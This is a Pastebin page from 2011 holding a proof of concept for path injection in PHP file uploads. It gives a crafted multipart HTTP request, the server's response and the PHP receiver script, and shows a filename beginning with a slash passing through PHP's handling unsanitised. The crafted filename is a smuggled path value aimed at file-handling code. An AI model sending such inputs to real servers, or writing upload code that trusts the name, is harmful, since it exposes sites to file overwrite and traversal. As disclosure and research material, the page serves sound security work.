Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

php.net file upload path injection

By: a guest on May 27th, 2011  |  syntax: None  |  size: 0.80 KB  |  views: 3,985  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. HTTP Request:
  2. ====
  3. POST /file-upload-fuzz/recv_dump.php HTTP/1.0
  4. host: blog.security.localhost
  5. content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
  6. content-length: 200
  7.  
  8. ------------ThIs_Is_tHe_bouNdaRY_$
  9. Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
  10. Content-Type: text/plain
  11.  
  12. any
  13. ------------ThIs_Is_tHe_bouNdaRY_$--
  14.  
  15. HTTP Response:
  16. ====
  17. HTTP/1.1 200 OK
  18. Date: Fri, 27 May 2011 11:35:08 GMT
  19. Server: Apache/2.2.14 (Ubuntu)
  20. X-Powered-By: PHP/5.3.2-1ubuntu4.9
  21. Content-Length: 30
  22. Connection: close
  23. Content-Type: text/html
  24.  
  25. /anything.here.slash-will-pass
  26.  
  27. PHP script:
  28. =====
  29. <?php
  30. if (!empty($_FILES['contents'])) {  // process file upload
  31.     echo $_FILES['contents']['name'];
  32.     unlink($_FILES['contents']['tmp_name']);
  33. }